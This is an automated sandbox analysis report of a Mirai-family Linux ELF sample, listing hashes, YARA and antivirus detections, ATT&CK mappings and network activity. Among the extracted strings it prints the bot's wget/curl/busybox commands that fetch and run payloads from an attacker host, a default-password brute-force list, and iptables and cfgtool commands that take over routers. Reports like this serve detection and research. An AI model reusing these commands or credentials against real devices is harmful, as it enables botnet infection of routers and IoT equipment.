
Linux Analysis Report
i.elf

Overview

General Information

Sample name: i.elf
Analysis ID: 1649978
MD5: 93e334e8fabc576799f12af1aba19e43
SHA1: 2ae559c2e550f4a7746765608383ffdd34054665
SHA256: 10fa6b6e524f39fdfb00803df138d657d5070c88f4fa788fcceb0d0d0de53651
Tags: elf, user-abuse_ch

Detection

Mirai
Score: 88
Range: 0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample contains strings that are potentially command strings
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1649978
Start date and time: 2025-03-27 10:53:19 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 25s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode: default
Sample name: i.elf
Detection: MAL
Classification: mal88.troj.linELF@0/0@2/0
Command: /tmp/i.elf
PID: 5439
Exit Code: 135
Exit Code Info:
Killed: False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • i.elf (PID: 5439, Parent: 5361, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/i.elf
  • cleanup
Malware family: Mirai
Description: Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
Yara matches on the sample file (Source | Rule | Description | Author | Strings)
i.elf | JoeSecurity_Mirai_9 | Yara detected Mirai | Joe Security
i.elf | JoeSecurity_Mirai_5 | Yara detected Mirai | Joe Security
i.elf | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security
i.elf | Linux_Trojan_Mirai_5c62e6b2 | unknown | unknown
  • 0x3850e:$a: FF C1 83 F9 05 7F 14 48 63 C1 48 89 94 C4 00 01 00 00 FF C6 48
i.elf | Linux_Trojan_Mirai_77137320 | unknown | unknown
  • 0x384f5:$a: 54 24 01 89 C7 31 F6 31 C9 48 89 A4 24 00 01 00 00 EB 1D 80 7A

Yara matches on process memory (Source | Rule | Description | Author | Strings)
5439.1.00007fcae4017000.00007fcae4058000.r-x.sdmp | JoeSecurity_Mirai_9 | Yara detected Mirai | Joe Security
5439.1.00007fcae4017000.00007fcae4058000.r-x.sdmp | JoeSecurity_Mirai_5 | Yara detected Mirai | Joe Security
5439.1.00007fcae4017000.00007fcae4058000.r-x.sdmp | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security
5439.1.00007fcae4017000.00007fcae4058000.r-x.sdmp | Linux_Trojan_Mirai_5c62e6b2 | unknown | unknown
  • 0x3850e:$a: FF C1 83 F9 05 7F 14 48 63 C1 48 89 94 C4 00 01 00 00 FF C6 48
5439.1.00007fcae4017000.00007fcae4058000.r-x.sdmp | Linux_Trojan_Mirai_77137320 | unknown | unknown
  • 0x384f5:$a: 54 24 01 89 C7 31 F6 31 C9 48 89 A4 24 00 01 00 00 EB 1D 80 7A
              No Suricata rule has matched


              AV Detection

Source: i.elf | Avira: detected
Source: i.elf | Virustotal: Detection: 62%
Source: i.elf | ReversingLabs: Detection: 58%
Source: i.elf | String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: i.elf | String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: i.elf | String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: daisy.ubuntu.com
Source: i.elf | String found in binary or memory: http://%s:%d/Mozi.m
Source: i.elf | String found in binary or memory: http://%s:%d/Mozi.m;
Source: i.elf | String found in binary or memory: http://%s:%d/bin.sh
Source: i.elf | String found in binary or memory: http://%s:%d/bin.sh;chmod
Source: i.elf | String found in binary or memory: http://127.0.0.1
Source: i.elf | String found in binary or memory: http://127.0.0.1sendcmd
Source: i.elf | String found in binary or memory: http://HTTP/1.1
Source: i.elf | String found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
Source: i.elf | String found in binary or memory: http://ipinfo.io/ip
Source: i.elf | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: i.elf | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: i.elf | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//

              System Summary

Source: i.elf, type: SAMPLE | Matched rule: Linux_Trojan_Mirai_5c62e6b2 Author: unknown
Source: i.elf, type: SAMPLE | Matched rule: Linux_Trojan_Mirai_77137320 Author: unknown
Source: i.elf, type: SAMPLE | Matched rule: Linux_Trojan_Mirai_ac253e4f Author: unknown
Source: 5439.1.00007fcae4017000.00007fcae4058000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_5c62e6b2 Author: unknown
Source: 5439.1.00007fcae4017000.00007fcae4058000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_77137320 Author: unknown
Source: 5439.1.00007fcae4017000.00007fcae4058000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_ac253e4f Author: unknown
Source: Initial sample | String containing 'busybox' found: busybox
Source: Initial sample | String containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
Source: Initial sample | String containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
Source: Initial sample | String containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
Source: Initial sample | String containing 'busybox' found: /bin/busybox cat /bin/ls|more
Source: Initial sample | String containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
Source: Initial sample | String containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
Source: Initial sample | String containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
Source: Initial sample | String containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
Source: Initial sample | String containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample | String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample | String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Initial sample | String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
Source: Initial sample | String containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
Source: Initial sample | String containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample | String containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample | String containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample | String containing potential weak password found: admin
Source: Initial sample | String containing potential weak password found: default
Source: Initial sample | String containing potential weak password found: support
Source: Initial sample | String containing potential weak password found: service
Source: Initial sample | String containing potential weak password found: supervisor
Source: Initial sample | String containing potential weak password found: guest
Source: Initial sample | String containing potential weak password found: administrator
Source: Initial sample | String containing potential weak password found: 123456
Source: Initial sample | String containing potential weak password found: 54321
Source: Initial sample | String containing potential weak password found: password
Source: Initial sample | String containing potential weak password found: 12345
Source: Initial sample | String containing potential weak password found: admin1234
Source: Initial sample | Potential command found: GET /c HTTP/1.0
Source: Initial sample | Potential command found: GET %s HTTP/1.1
Source: Initial sample | Potential command found: GET /c
Source: Initial sample | Potential command found: GET /Mozi.6 HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.7 HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.c HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.m HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.x HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.a HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.s HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.r HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.b HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.4 HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.k HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.l HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.p HTTP/1.0
Source: Initial sample | Potential command found: GET /%s HTTP/1.1
Source: i.elf, type: SAMPLE | Matched rule: Linux_Trojan_Mirai_5c62e6b2 (reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8, id = 5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b, last_modified = 2021-09-16)
Source: i.elf, type: SAMPLE | Matched rule: Linux_Trojan_Mirai_77137320 (reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b, id = 77137320-6c7e-4bb8-81a4-bd422049c309, last_modified = 2021-09-16)
Source: i.elf, type: SAMPLE | Matched rule: Linux_Trojan_Mirai_ac253e4f (reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea, id = ac253e4f-b628-4dd0-91f1-f19099286992, last_modified = 2021-09-16)
Source: 5439.1.00007fcae4017000.00007fcae4058000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_5c62e6b2 (reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8, id = 5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b, last_modified = 2021-09-16)
Source: 5439.1.00007fcae4017000.00007fcae4058000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_77137320 (reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b, id = 77137320-6c7e-4bb8-81a4-bd422049c309, last_modified = 2021-09-16)
Source: 5439.1.00007fcae4017000.00007fcae4058000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_ac253e4f (reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea, id = ac253e4f-b628-4dd0-91f1-f19099286992, last_modified = 2021-09-16)
Source: classification engine | Classification label: mal88.troj.linELF@0/0@2/0
Source: /tmp/i.elf (PID: 5439) | Queries kernel information via 'uname'
Source: i.elf, 5439.1.00007ffee5d4f000.00007ffee5d70000.rw-.sdmp | Binary or memory string: \x86_64/usr/bin/qemu-arm/tmp/i.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/i.elf
Source: i.elf, 5439.1.0000563c46bec000.0000563c46cf8000.rw-.sdmp | Binary or memory string: F<Vrg.qemu.gdb.arm.sys.regs">
Source: i.elf, 5439.1.0000563c46bec000.0000563c46cf8000.rw-.sdmp | Binary or memory string: /etc/qemu-binfmt/arm
Source: i.elf, 5439.1.00007ffee5d4f000.00007ffee5d70000.rw-.sdmp | Binary or memory string: /usr/bin/qemu-arm
Source: i.elf, 5439.1.0000563c46bec000.0000563c46cf8000.rw-.sdmp | Binary or memory string: F<V!/etc/qemu-binfmt/arm
Source: i.elf, 5439.1.0000563c46bec000.0000563c46cf8000.rw-.sdmp | Binary or memory string: rg.qemu.gdb.arm.sys.regs">

              Stealing of Sensitive Information

Source: Yara match | File source: i.elf, type: SAMPLE
Source: Yara match | File source: 5439.1.00007fcae4017000.00007fcae4058000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: i.elf PID: 5439, type: MEMORYSTR

              Remote Access Functionality

Source: Yara match | File source: i.elf, type: SAMPLE
Source: Yara match | File source: 5439.1.00007fcae4017000.00007fcae4058000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: i.elf PID: 5439, type: MEMORYSTR

MITRE ATT&CK Matrix (tactic: techniques; a leading number is the count of matching signatures)

Reconnaissance: Gather Victim Identity Information; Credentials
Resource Development: 1 Scripting; Domains
Initial Access: Valid Accounts; Default Accounts
Execution: 1 Command and Scripting Interpreter; Scheduled Task/Job
Persistence: 1 Scripting; Boot or Logon Initialization Scripts
Privilege Escalation: Path Interception; Boot or Logon Initialization Scripts
Defense Evasion: Direct Volume Access; Rootkit
Credential Access: 1 Brute Force; LSASS Memory
Discovery: 11 Security Software Discovery; Application Window Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol
Collection: Data from Local System; Data from Removable Media
Command and Control: 1 Non-Application Layer Protocol; 1 Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth
Impact: Abuse Accessibility Features; Network Denial of Service
              No configs have been found
Behavior Graph (ID: 1649978, Sample: i.elf, Startdate: 27/03/2025, Architecture: LINUX, Score: 88): process i.elf started; DNS/IP: daisy.ubuntu.com; signatures: Malicious sample detected (through community Yara rule), Antivirus / Scanner detection for submitted sample, Multi AV Scanner detection for submitted file, Yara detected Mirai.

Antivirus detection (Source | Detection | Scanner | Label)
i.elf | 63% | Virustotal |
i.elf | 58% | ReversingLabs | Linux.Backdoor.Mirai
i.elf | 100% | Avira | EXP/ELF.Mirai.O
No Antivirus matches


Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation)
daisy.ubuntu.com | 162.213.35.25 | true | false | | high

URLs (Name | Source | Malicious | Antivirus Detection | Reputation)
http://%s:%d/bin.sh;chmod | i.elf | false | | high
http://HTTP/1.1 | i.elf | false | | high
http://ipinfo.io/ip | i.elf | false | | high
http://127.0.0.1 | i.elf | false | | high
http://baidu.com/%s/%s/%d/%s/%s/%s/%s) | i.elf | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | i.elf | false | | high
http://schemas.xmlsoap.org/soap/envelope// | i.elf | false | | high
http://%s:%d/bin.sh | i.elf | false | | high
http://%s:%d/Mozi.m | i.elf | false | | high
http://127.0.0.1sendcmd | i.elf | false | | high
http://%s:%d/Mozi.m; | i.elf | false | | high
http://schemas.xmlsoap.org/soap/envelope/ | i.elf | false | | high
                                        No contacted IP infos
                                        No context
Context for daisy.ubuntu.com (Associated Sample Name / URL | Detection | Threat Name | Context)
i.elf | malicious | Mirai | 162.213.35.25
morte.spc.elf | malicious | Unknown | 162.213.35.25
efjepc.elf | malicious | Gafgyt, Mirai | 162.213.35.25
morte.arm6.elf | malicious | Unknown | 162.213.35.25
spc.elf | malicious | Okiru | 162.213.35.24
resgod.ppc.elf | malicious | Mirai | 162.213.35.24
x64.elf | malicious | Gafgyt, Okiru | 162.213.35.24
resgod.arm7.elf | malicious | Mirai | 162.213.35.25
resgod.m68k.elf | malicious | Mirai | 162.213.35.24
resgod.sh4.elf | malicious | Mirai | 162.213.35.25
                                        No created / dropped files found
File type: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, missing section headers at 307920
Entropy (8bit): 6.121203743939349
TrID:
• ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name: i.elf
File size: 272'748 bytes
MD5: 93e334e8fabc576799f12af1aba19e43
SHA1: 2ae559c2e550f4a7746765608383ffdd34054665
SHA256: 10fa6b6e524f39fdfb00803df138d657d5070c88f4fa788fcceb0d0d0de53651
SHA512: 4f25cf9627a31a18bdeebc6e371cf8fc4660cd7d73f14f190ad9752c55559fc13e2637f08dc45a457b1504f6c8d49eee35f20bc8ced062df1d821a0c745e7ae2
SSDEEP: 6144:T2s/gAWuboqsJ9xcJxspJBqQgTuaJZRhVabE5wKSDP99zBa77oNsKqqfPqOJ:T2s/bW+UmJqBxAuaPRhVabEDSDP99zBT
TLSH: 6644398AFD81AF25D5C5227BFE2F428A33131BB8D2EB71129D145F24768A94F0F3A541
File Content Preview: .ELF..............(.........4...P.......4. ...(........p............(...(...............................................................8...........................................Q.td..................................-...L..................@-.,@...0....S

Network traffic (Timestamp | Source Port | Dest Port | Source IP | Dest IP)
Mar 27, 2025 10:54:12.094376087 CET | 39258 | 53 | 192.168.2.13 | 1.1.1.1
Mar 27, 2025 10:54:12.094470024 CET | 54959 | 53 | 192.168.2.13 | 1.1.1.1
Mar 27, 2025 10:54:12.179481030 CET | 53 | 54959 | 1.1.1.1 | 192.168.2.13
Mar 27, 2025 10:54:12.179543018 CET | 53 | 39258 | 1.1.1.1 | 192.168.2.13

DNS queries (Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS)
Mar 27, 2025 10:54:12.094376087 CET | 192.168.2.13 | 1.1.1.1 | 0x84ab | Standard query (0) | daisy.ubuntu.com | A (IP address) | IN (0x0001) | false
Mar 27, 2025 10:54:12.094470024 CET | 192.168.2.13 | 1.1.1.1 | 0x7498 | Standard query (0) | daisy.ubuntu.com | 28 | IN (0x0001) | false

DNS answers (Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS)
Mar 27, 2025 10:54:12.179543018 CET | 1.1.1.1 | 192.168.2.13 | 0x84ab | No error (0) | daisy.ubuntu.com | | 162.213.35.25 | A (IP address) | IN (0x0001) | false
Mar 27, 2025 10:54:12.179543018 CET | 1.1.1.1 | 192.168.2.13 | 0x84ab | No error (0) | daisy.ubuntu.com | | 162.213.35.24 | A (IP address) | IN (0x0001) | false

                                        System Behavior

Start time (UTC): 09:54:09
Start date (UTC): 27/03/2025
Path: /tmp/i.elf
Arguments: /tmp/i.elf
File size: 4956856 bytes
MD5 hash: 5ebfcae4fe2471fcc5695c2394773ff1